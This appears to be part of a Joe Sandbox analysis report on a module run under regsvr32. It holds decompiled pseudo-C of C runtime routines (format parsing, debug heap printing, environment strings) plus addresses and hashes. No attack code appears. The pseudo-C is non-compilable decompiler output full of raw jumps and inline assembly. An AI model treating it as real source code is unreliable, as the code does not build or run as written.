                                                                                                                                            				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0x65d0df5d;
                                                                                                                                            				goto 0x65d0df6d;
                                                                                                                                            				_a1216 = 0;
                                                                                                                                            				goto E00007FFC7FFC65D0DC41;
                                                                                                                                            				goto 0x65d0df88;
                                                                                                                                            				_a80 = _a80 | 0x00000020;
                                                                                                                                            				goto 0x65d0df88;
                                                                                                                                            				asm("bts eax, 0xb");
                                                                                                                                            				_a1412 = _a1208 & 0x0000ffff;
                                                                                                                                            				_a1412 = _a1412 - 0x41;
                                                                                                                                            				if (_a1412 - 0x37 > 0) goto 0x65d0ea2a;
                                                                                                                                            				goto __rax;
                                                                                                                                            			}






                                                                                                                                            0x7ffc65d0dd3b
                                                                                                                                            0x7ffc65d0dd3d
                                                                                                                                            0x7ffc65d0dd4a
                                                                                                                                            0x7ffc65d0dd53
                                                                                                                                            0x7ffc65d0dd5c
                                                                                                                                            0x7ffc65d0dd66
                                                                                                                                            0x7ffc65d0dd6a
                                                                                                                                            0x7ffc65d0dd7f
                                                                                                                                            0x7ffc65d0dd88
                                                                                                                                            0x7ffc65d0dda0
                                                                                                                                            0x7ffc65d0dda2
                                                                                                                                            0x7ffc65d0ddaf
                                                                                                                                            0x7ffc65d0ddb8
                                                                                                                                            0x7ffc65d0ddba
                                                                                                                                            0x7ffc65d0ddc2
                                                                                                                                            0x7ffc65d0ddd7
                                                                                                                                            0x7ffc65d0dde8
                                                                                                                                            0x7ffc65d0ddf7
                                                                                                                                            0x7ffc65d0de01
                                                                                                                                            0x7ffc65d0de0f
                                                                                                                                            0x7ffc65d0de19
                                                                                                                                            0x7ffc65d0de1f
                                                                                                                                            0x7ffc65d0de32
                                                                                                                                            0x7ffc65d0de40
                                                                                                                                            0x7ffc65d0de4c
                                                                                                                                            0x7ffc65d0de54
                                                                                                                                            0x7ffc65d0de5d
                                                                                                                                            0x7ffc65d0de61
                                                                                                                                            0x7ffc65d0de6a
                                                                                                                                            0x7ffc65d0de80
                                                                                                                                            0x7ffc65d0de91
                                                                                                                                            0x7ffc65d0de9f
                                                                                                                                            0x7ffc65d0deab
                                                                                                                                            0x7ffc65d0deb3
                                                                                                                                            0x7ffc65d0dec6
                                                                                                                                            0x7ffc65d0ded7
                                                                                                                                            0x7ffc65d0dee5
                                                                                                                                            0x7ffc65d0def1
                                                                                                                                            0x7ffc65d0def9
                                                                                                                                            0x7ffc65d0df09
                                                                                                                                            0x7ffc65d0df19
                                                                                                                                            0x7ffc65d0df29
                                                                                                                                            0x7ffc65d0df39
                                                                                                                                            0x7ffc65d0df49
                                                                                                                                            0x7ffc65d0df59
                                                                                                                                            0x7ffc65d0df5b
                                                                                                                                            0x7ffc65d0df5d
                                                                                                                                            0x7ffc65d0df68
                                                                                                                                            0x7ffc65d0df6d
                                                                                                                                            0x7ffc65d0df76
                                                                                                                                            0x7ffc65d0df7a
                                                                                                                                            0x7ffc65d0df80
                                                                                                                                            0x7ffc65d0df95
                                                                                                                                            0x7ffc65d0dfa6
                                                                                                                                            0x7ffc65d0dfb5
                                                                                                                                            0x7ffc65d0dfdc

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                                                                                                                            • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                                                                            • API String ID: 2576288505-734865713
                                                                                                                                            • Opcode ID: 73e6b479e683be5ecb6b5fbd55da46f8fdb801a5518f0397c70b55b6842a44e9
                                                                                                                                            • Instruction ID: 6f13e45367b16fa85c9c3f6d2c1b0f87e3f379943f9b56af04060906bb94663b
                                                                                                                                            • Opcode Fuzzy Hash: 73e6b479e683be5ecb6b5fbd55da46f8fdb801a5518f0397c70b55b6842a44e9
                                                                                                                                            • Instruction Fuzzy Hash: BF512DB290C6EAC9E774DF14E5403BAB7A0EB84B45F600536E68D875D8DB6CD440CF24
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            C-Code - Quality: 24%
                                                                                                                                            			E00007FFC7FFC65D0BDE7(signed int _a80, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096, char _a1112) {
                                                                                                                                            				void* _t113;
                                                                                                                                            				char* _t133;
                                                                                                                                            
                                                                                                                                            				if (_a696 != 0x2a) goto 0x65d0be16;
                                                                                                                                            				_t133 =  &_a1112;
                                                                                                                                            				_a116 = E00007FFC7FFC65D01E40(_t133);
                                                                                                                                            				if (_a116 >= 0) goto 0x65d0be14;
                                                                                                                                            				_a116 = 0xffffffff;
                                                                                                                                            				goto 0x65d0be2d;
                                                                                                                                            				_a116 = _t113 + _t133 - 0x30;
                                                                                                                                            				_a972 = _a696 & 0x000000ff;
                                                                                                                                            				if (_a972 == 0x49) goto 0x65d0beb7;
                                                                                                                                            				if (_a972 == 0x68) goto 0x65d0bfc0;
                                                                                                                                            				if (_a972 == 0x6c) goto 0x65d0be76;
                                                                                                                                            				if (_a972 == 0x77) goto 0x65d0bfcd;
                                                                                                                                            				goto 0x65d0bfd9;
                                                                                                                                            				if ( *_a1096 != 0x6c) goto 0x65d0bea7;
                                                                                                                                            				_a1096 = _a1096 + 1;
                                                                                                                                            				asm("bts eax, 0xc");
                                                                                                                                            				goto 0x65d0beb2;
                                                                                                                                            				_a80 = _a80 | 0x00000010;
                                                                                                                                            				goto 0x65d0bfd9;
                                                                                                                                            				asm("bts eax, 0xf");
                                                                                                                                            				if ( *_a1096 != 0x36) goto 0x65d0bf09;
                                                                                                                                            				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0x65d0bf09;
                                                                                                                                            				_a1096 = _a1096 + 2;
                                                                                                                                            				asm("bts eax, 0xf");
                                                                                                                                            				goto 0x65d0bfbe;
                                                                                                                                            				if ( *_a1096 != 0x33) goto 0x65d0bf4c;
                                                                                                                                            				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0x65d0bf4c;
                                                                                                                                            				_a1096 = _a1096 + 2;
                                                                                                                                            				asm("btr eax, 0xf");
                                                                                                                                            				goto 0x65d0bfbe;
                                                                                                                                            				if ( *_a1096 == 0x64) goto 0x65d0bfac;
                                                                                                                                            				if ( *_a1096 == 0x69) goto 0x65d0bfac;
                                                                                                                                            				if ( *_a1096 == 0x6f) goto 0x65d0bfac;
                                                                                                                                            				if ( *_a1096 == 0x75) goto 0x65d0bfac;
                                                                                                                                            				if ( *_a1096 == 0x78) goto 0x65d0bfac;
                                                                                                                                            				if ( *_a1096 != 0x58) goto 0x65d0bfae;
                                                                                                                                            				goto 0x65d0bfbe;
                                                                                                                                            				_a704 = 0;
                                                                                                                                            				goto E00007FFC7FFC65D0BB66;
                                                                                                                                            				goto 0x65d0bfd9;
                                                                                                                                            				_a80 = _a80 | 0x00000020;
                                                                                                                                            				goto 0x65d0bfd9;
                                                                                                                                            				asm("bts eax, 0xb");
                                                                                                                                            				_a976 = _a696;
                                                                                                                                            				_a976 = _a976 - 0x41;
                                                                                                                                            				if (_a976 - 0x37 > 0) goto 0x65d0ca31;
                                                                                                                                            				goto __rax;
                                                                                                                                            			}





                                                                                                                                            0x7ffc65d0bdf2
                                                                                                                                            0x7ffc65d0bdf4
                                                                                                                                            0x7ffc65d0be01
                                                                                                                                            0x7ffc65d0be0a
                                                                                                                                            0x7ffc65d0be0c
                                                                                                                                            0x7ffc65d0be14
                                                                                                                                            0x7ffc65d0be29
                                                                                                                                            0x7ffc65d0be3a
                                                                                                                                            0x7ffc65d0be49
                                                                                                                                            0x7ffc65d0be53
                                                                                                                                            0x7ffc65d0be61
                                                                                                                                            0x7ffc65d0be6b
                                                                                                                                            0x7ffc65d0be71
                                                                                                                                            0x7ffc65d0be84
                                                                                                                                            0x7ffc65d0be91
                                                                                                                                            0x7ffc65d0be9d
                                                                                                                                            0x7ffc65d0bea5
                                                                                                                                            0x7ffc65d0beae
                                                                                                                                            0x7ffc65d0beb2
                                                                                                                                            0x7ffc65d0bebb
                                                                                                                                            0x7ffc65d0bed1
                                                                                                                                            0x7ffc65d0bee2
                                                                                                                                            0x7ffc65d0bef0
                                                                                                                                            0x7ffc65d0befc
                                                                                                                                            0x7ffc65d0bf04
                                                                                                                                            0x7ffc65d0bf17
                                                                                                                                            0x7ffc65d0bf28
                                                                                                                                            0x7ffc65d0bf36
                                                                                                                                            0x7ffc65d0bf42
                                                                                                                                            0x7ffc65d0bf4a
                                                                                                                                            0x7ffc65d0bf5a
                                                                                                                                            0x7ffc65d0bf6a
                                                                                                                                            0x7ffc65d0bf7a
                                                                                                                                            0x7ffc65d0bf8a
                                                                                                                                            0x7ffc65d0bf9a
                                                                                                                                            0x7ffc65d0bfaa
                                                                                                                                            0x7ffc65d0bfac
                                                                                                                                            0x7ffc65d0bfae
                                                                                                                                            0x7ffc65d0bfb9
                                                                                                                                            0x7ffc65d0bfbe
                                                                                                                                            0x7ffc65d0bfc7
                                                                                                                                            0x7ffc65d0bfcb
                                                                                                                                            0x7ffc65d0bfd1
                                                                                                                                            0x7ffc65d0bfe6
                                                                                                                                            0x7ffc65d0bff7
                                                                                                                                            0x7ffc65d0c006
                                                                                                                                            0x7ffc65d0c02d

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                                                                                                                            • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                                                                            • API String ID: 2576288505-192189897
                                                                                                                                            • Opcode ID: 4684e22f791ce69839f562b923e995fff9986fe21dc9389a852d4c7307e36990
                                                                                                                                            • Instruction ID: 0bda0f3756f8867f05a2ac9ae2fdd7455e13837e3c02b1e00f8fb0a8d3314ec7
                                                                                                                                            • Opcode Fuzzy Hash: 4684e22f791ce69839f562b923e995fff9986fe21dc9389a852d4c7307e36990
                                                                                                                                            • Instruction Fuzzy Hash: D1416D6290C6EACAE374DF24E5543BEB7A4EB84B04F600935D29D829E9DF2CD540CF20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            C-Code - Quality: 24%
                                                                                                                                            			E00007FFC7FFC65D0DD95(signed int _a80, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
                                                                                                                                            				void* _t113;
                                                                                                                                            				char* _t133;
                                                                                                                                            
                                                                                                                                            				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0x65d0ddc4;
                                                                                                                                            				_t133 =  &_a1560;
                                                                                                                                            				_a116 = E00007FFC7FFC65D01E40(_t133);
                                                                                                                                            				if (_a116 >= 0) goto 0x65d0ddc2;
                                                                                                                                            				_a116 = 0xffffffff;
                                                                                                                                            				goto 0x65d0dddb;
                                                                                                                                            				_a116 = _t113 + _t133 - 0x30;
                                                                                                                                            				_a1408 = _a1208 & 0x0000ffff;
                                                                                                                                            				if (_a1408 == 0x49) goto 0x65d0de66;
                                                                                                                                            				if (_a1408 == 0x68) goto 0x65d0df6f;
                                                                                                                                            				if (_a1408 == 0x6c) goto 0x65d0de24;
                                                                                                                                            				if (_a1408 == 0x77) goto 0x65d0df7c;
                                                                                                                                            				goto 0x65d0df88;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0x65d0de56;
                                                                                                                                            				_a1544 =  &(_a1544[1]);
                                                                                                                                            				asm("bts eax, 0xc");
                                                                                                                                            				goto 0x65d0de61;
                                                                                                                                            				_a80 = _a80 | 0x00000010;
                                                                                                                                            				goto 0x65d0df88;
                                                                                                                                            				asm("bts eax, 0xf");
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0x65d0deb8;
                                                                                                                                            				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0x65d0deb8;
                                                                                                                                            				_a1544 =  &(_a1544[2]);
                                                                                                                                            				asm("bts eax, 0xf");
                                                                                                                                            				goto 0x65d0df6d;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0x65d0defb;
                                                                                                                                            				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0x65d0defb;
                                                                                                                                            				_a1544 =  &(_a1544[2]);
                                                                                                                                            				asm("btr eax, 0xf");
                                                                                                                                            				goto 0x65d0df6d;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0x65d0df5b;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0x65d0df5b;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0x65d0df5b;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0x65d0df5b;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0x65d0df5b;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0x65d0df5d;
                                                                                                                                            				goto 0x65d0df6d;
                                                                                                                                            				_a1216 = 0;
                                                                                                                                            				goto E00007FFC7FFC65D0DC41;
                                                                                                                                            				goto 0x65d0df88;
                                                                                                                                            				_a80 = _a80 | 0x00000020;
                                                                                                                                            				goto 0x65d0df88;
                                                                                                                                            				asm("bts eax, 0xb");
                                                                                                                                            				_a1412 = _a1208 & 0x0000ffff;
                                                                                                                                            				_a1412 = _a1412 - 0x41;
                                                                                                                                            				if (_a1412 - 0x37 > 0) goto 0x65d0ea2a;
                                                                                                                                            				goto __rax;
                                                                                                                                            			}





                                                                                                                                            0x7ffc65d0dda0
                                                                                                                                            0x7ffc65d0dda2
                                                                                                                                            0x7ffc65d0ddaf
                                                                                                                                            0x7ffc65d0ddb8
                                                                                                                                            0x7ffc65d0ddba
                                                                                                                                            0x7ffc65d0ddc2
                                                                                                                                            0x7ffc65d0ddd7
                                                                                                                                            0x7ffc65d0dde8
                                                                                                                                            0x7ffc65d0ddf7
                                                                                                                                            0x7ffc65d0de01
                                                                                                                                            0x7ffc65d0de0f
                                                                                                                                            0x7ffc65d0de19
                                                                                                                                            0x7ffc65d0de1f
                                                                                                                                            0x7ffc65d0de32
                                                                                                                                            0x7ffc65d0de40
                                                                                                                                            0x7ffc65d0de4c
                                                                                                                                            0x7ffc65d0de54
                                                                                                                                            0x7ffc65d0de5d
                                                                                                                                            0x7ffc65d0de61
                                                                                                                                            0x7ffc65d0de6a
                                                                                                                                            0x7ffc65d0de80
                                                                                                                                            0x7ffc65d0de91
                                                                                                                                            0x7ffc65d0de9f
                                                                                                                                            0x7ffc65d0deab
                                                                                                                                            0x7ffc65d0deb3
                                                                                                                                            0x7ffc65d0dec6
                                                                                                                                            0x7ffc65d0ded7
                                                                                                                                            0x7ffc65d0dee5
                                                                                                                                            0x7ffc65d0def1
                                                                                                                                            0x7ffc65d0def9
                                                                                                                                            0x7ffc65d0df09
                                                                                                                                            0x7ffc65d0df19
                                                                                                                                            0x7ffc65d0df29
                                                                                                                                            0x7ffc65d0df39
                                                                                                                                            0x7ffc65d0df49
                                                                                                                                            0x7ffc65d0df59
                                                                                                                                            0x7ffc65d0df5b
                                                                                                                                            0x7ffc65d0df5d
                                                                                                                                            0x7ffc65d0df68
                                                                                                                                            0x7ffc65d0df6d
                                                                                                                                            0x7ffc65d0df76
                                                                                                                                            0x7ffc65d0df7a
                                                                                                                                            0x7ffc65d0df80
                                                                                                                                            0x7ffc65d0df95
                                                                                                                                            0x7ffc65d0dfa6
                                                                                                                                            0x7ffc65d0dfb5
                                                                                                                                            0x7ffc65d0dfdc

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                                                                                                                            • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                                                                            • API String ID: 2576288505-734865713
                                                                                                                                            • Opcode ID: d152d77759d1a8b77c8e40c3a5b6b9e992a9212ee747c51bfdc081fcc3156ca6
                                                                                                                                            • Instruction ID: 0245109be48923b86cdbff52e052c1db2c16a9998a763de211576d5414712d22
                                                                                                                                            • Opcode Fuzzy Hash: d152d77759d1a8b77c8e40c3a5b6b9e992a9212ee747c51bfdc081fcc3156ca6
                                                                                                                                            • Instruction Fuzzy Hash: 74413DB290C6AACAE7749F25E5403BAB6A0FB84B45F600536D68D866D8DF3CD441CF24
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invoke_watson_if_oneof_swprintf_p
                                                                                                                                            • String ID: %.2X $(*_errno())$_printMemBlockData$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                                                                                                                            • API String ID: 2731067127-3604075083
                                                                                                                                            • Opcode ID: fe7d44c8fd9bf19f096a73d3f0335bde0191fec95794c4c7e73345e4b193bd8e
                                                                                                                                            • Instruction ID: a3ba55acef779767e4e7bc45eba0a4da5bd224340d6a1f7e5f447506fb7b7d30
                                                                                                                                            • Opcode Fuzzy Hash: fe7d44c8fd9bf19f096a73d3f0335bde0191fec95794c4c7e73345e4b193bd8e
                                                                                                                                            • Instruction Fuzzy Hash: 1341483360D699D6E6348F51E4903AABBA1FB88B40F604536D68D47B89DF3ED444CB20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                                                                            • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\a_env.c
                                                                                                                                            • API String ID: 1823725401-2473407871
                                                                                                                                            • Opcode ID: 12bd68ef287a579055a6545109484f2ffc82b1f6f13cfb147b3cff23ff6676d3
                                                                                                                                            • Instruction ID: fc8d1e62ac754b4970134d9414a4db02cf811163e0dba1cf076f7719d21bce27
                                                                                                                                            • Opcode Fuzzy Hash: 12bd68ef287a579055a6545109484f2ffc82b1f6f13cfb147b3cff23ff6676d3
                                                                                                                                            • Instruction Fuzzy Hash: 7C41B73261CB99C6E7648F56E44472AB7A0FB89B94F200425EACD47BA8DF7ED444CB10
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            C-Code - Quality: 41%
                                                                                                                                            			E00007FFC7FFC65D04F20(long long __rax, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24, signed int _a32) {
                                                                                                                                            				void* _v16;
                                                                                                                                            				long long _v24;
                                                                                                                                            				long long _v32;
                                                                                                                                            				long long _v40;
                                                                                                                                            				long long _v48;
                                                                                                                                            				void* _v56;
                                                                                                                                            				signed int _v72;
                                                                                                                                            				long long _v80;
                                                                                                                                            				signed int _v88;
                                                                                                                                            				void* _t88;
                                                                                                                                            				void* _t89;
                                                                                                                                            				void* _t90;
                                                                                                                                            				void* _t92;
                                                                                                                                            				void* _t93;
                                                                                                                                            				void* _t101;
                                                                                                                                            				long long _t113;
                                                                                                                                            				intOrPtr _t116;
                                                                                                                                            				void* _t117;
                                                                                                                                            				long long _t118;
                                                                                                                                            				long long _t121;
                                                                                                                                            				long long _t122;
                                                                                                                                            				long long _t125;
                                                                                                                                            				void* _t164;
                                                                                                                                            
                                                                                                                                            				_t113 = __rax;
                                                                                                                                            				_a32 = r9d;
                                                                                                                                            				_a24 = __r8;
                                                                                                                                            				_a16 = __rdx;
                                                                                                                                            				_a8 = __rcx;
                                                                                                                                            				_v88 = E00007FFC7FFC65D03B70(_a8, _a16, _a24);
                                                                                                                                            				E00007FFC7FFC65CFE680(_t79, _t113);
                                                                                                                                            				_v80 = _t113;
                                                                                                                                            				0x65cf4000();
                                                                                                                                            				_v56 = _t113 + 0x100;
                                                                                                                                            				 *_v56 =  *_v56 + 1;
                                                                                                                                            				if (_v88 == 0xffffffff) goto 0x65d05103;
                                                                                                                                            				if (_v88 - _a32 <= 0) goto 0x65d05103;
                                                                                                                                            				if (_v88 - 0xffffffff <= 0) goto 0x65d04fb9;
                                                                                                                                            				_t116 = _a24;
                                                                                                                                            				if (_v88 -  *((intOrPtr*)(_t116 + 4)) >= 0) goto 0x65d04fb9;
                                                                                                                                            				goto 0x65d04fbe;
                                                                                                                                            				E00007FFC7FFC65CFE680(E00007FFC7FFC65CFCF80(_t116), _t116);
                                                                                                                                            				_t117 = _t116 +  *((intOrPtr*)(_a24 + 8));
                                                                                                                                            				_v72 =  *((intOrPtr*)(_t117 + _v88 * 8));
                                                                                                                                            				_t88 = E00007FFC7FFC65CFE680( *((intOrPtr*)(_t117 + _v88 * 8)), _t117);
                                                                                                                                            				_t118 = _t117 +  *((intOrPtr*)(_a24 + 8));
                                                                                                                                            				if ( *((intOrPtr*)(_t118 + 4 + _v88 * 8)) == 0) goto 0x65d05038;
                                                                                                                                            				_t89 = E00007FFC7FFC65CFE680(_t88, _t118);
                                                                                                                                            				_v48 = _t118;
                                                                                                                                            				_t90 = E00007FFC7FFC65CFE680(_t89, _t118);
                                                                                                                                            				_t121 = _v48 +  *((intOrPtr*)(_t118 +  *((intOrPtr*)(_a24 + 8)) + 4 + _v88 * 8));
                                                                                                                                            				_v40 = _t121;
                                                                                                                                            				goto 0x65d05041;
                                                                                                                                            				_v40 = 0;
                                                                                                                                            				if (_v40 == 0) goto 0x65d050f4;
                                                                                                                                            				r9d = _v72;
                                                                                                                                            				_t92 = E00007FFC7FFC65CFE680(E00007FFC7FFC65D03BD0(_t90, _a8, _a16, _a24), _t121);
                                                                                                                                            				_t122 = _t121 +  *((intOrPtr*)(_a24 + 8));
                                                                                                                                            				if ( *((intOrPtr*)(_t122 + 4 + _v88 * 8)) == 0) goto 0x65d050c9;
                                                                                                                                            				_t93 = E00007FFC7FFC65CFE680(_t92, _t122);
                                                                                                                                            				_v32 = _t122;
                                                                                                                                            				E00007FFC7FFC65CFE680(_t93, _t122);
                                                                                                                                            				_t125 = _v32 +  *((intOrPtr*)(_t122 +  *((intOrPtr*)(_a24 + 8)) + 4 + _v88 * 8));
                                                                                                                                            				_v24 = _t125;
                                                                                                                                            				goto 0x65d050d2;
                                                                                                                                            				_v24 = 0;
                                                                                                                                            				r8d = 0x103;
                                                                                                                                            				E00007FFC7FFC65CFE6C0(E00007FFC7FFC65D0D7E0(_v24, _a8, _t164), _t125, _v80);
                                                                                                                                            				goto 0x65d050f6;
                                                                                                                                            				_v88 = _v72;
                                                                                                                                            				goto 0x65d04f83;
                                                                                                                                            				0x65cf4000();
                                                                                                                                            				if ( *((intOrPtr*)(_t125 + 0x100)) <= 0) goto 0x65d05131;
                                                                                                                                            				0x65cf4000();
                                                                                                                                            				_v16 = _t125 + 0x100;
                                                                                                                                            				 *_v16 =  *_v16 - 1;
                                                                                                                                            				if (_v88 == 0xffffffff) goto 0x65d0514a;
                                                                                                                                            				if (_v88 - _a32 <= 0) goto 0x65d0514a;
                                                                                                                                            				_t101 = E00007FFC7FFC65CFCF80(_v16);
                                                                                                                                            				r9d = _v88;
                                                                                                                                            				return E00007FFC7FFC65D03BD0(_t101, _a8, _a16, _a24);
                                                                                                                                            			}


























                                                                                                                                            0x7ffc65d04f20
                                                                                                                                            0x7ffc65d04f20
                                                                                                                                            0x7ffc65d04f25
                                                                                                                                            0x7ffc65d04f2a
                                                                                                                                            0x7ffc65d04f2f
                                                                                                                                            0x7ffc65d04f55
                                                                                                                                            0x7ffc65d04f59
                                                                                                                                            0x7ffc65d04f5e
                                                                                                                                            0x7ffc65d04f63
                                                                                                                                            0x7ffc65d04f6e
                                                                                                                                            0x7ffc65d04f81
                                                                                                                                            0x7ffc65d04f88
                                                                                                                                            0x7ffc65d04f99
                                                                                                                                            0x7ffc65d04fa4
                                                                                                                                            0x7ffc65d04fa6
                                                                                                                                            0x7ffc65d04fb5
                                                                                                                                            0x7ffc65d04fb7
                                                                                                                                            0x7ffc65d04fbe
                                                                                                                                            0x7ffc65d04fcf
                                                                                                                                            0x7ffc65d04fda
                                                                                                                                            0x7ffc65d04fde
                                                                                                                                            0x7ffc65d04fef
                                                                                                                                            0x7ffc65d04ffc
                                                                                                                                            0x7ffc65d04ffe
                                                                                                                                            0x7ffc65d05003
                                                                                                                                            0x7ffc65d05008
                                                                                                                                            0x7ffc65d0502e
                                                                                                                                            0x7ffc65d05031
                                                                                                                                            0x7ffc65d05036
                                                                                                                                            0x7ffc65d05038
                                                                                                                                            0x7ffc65d05047
                                                                                                                                            0x7ffc65d0504d
                                                                                                                                            0x7ffc65d0506f
                                                                                                                                            0x7ffc65d05080
                                                                                                                                            0x7ffc65d0508d
                                                                                                                                            0x7ffc65d0508f
                                                                                                                                            0x7ffc65d05094
                                                                                                                                            0x7ffc65d05099
                                                                                                                                            0x7ffc65d050bf
                                                                                                                                            0x7ffc65d050c2
                                                                                                                                            0x7ffc65d050c7
                                                                                                                                            0x7ffc65d050c9
                                                                                                                                            0x7ffc65d050d2
                                                                                                                                            0x7ffc65d050ef
                                                                                                                                            0x7ffc65d050f4
                                                                                                                                            0x7ffc65d050fa
                                                                                                                                            0x7ffc65d050fe
                                                                                                                                            0x7ffc65d05103
                                                                                                                                            0x7ffc65d0510f
                                                                                                                                            0x7ffc65d05111
                                                                                                                                            0x7ffc65d0511c
                                                                                                                                            0x7ffc65d0512f
                                                                                                                                            0x7ffc65d05136
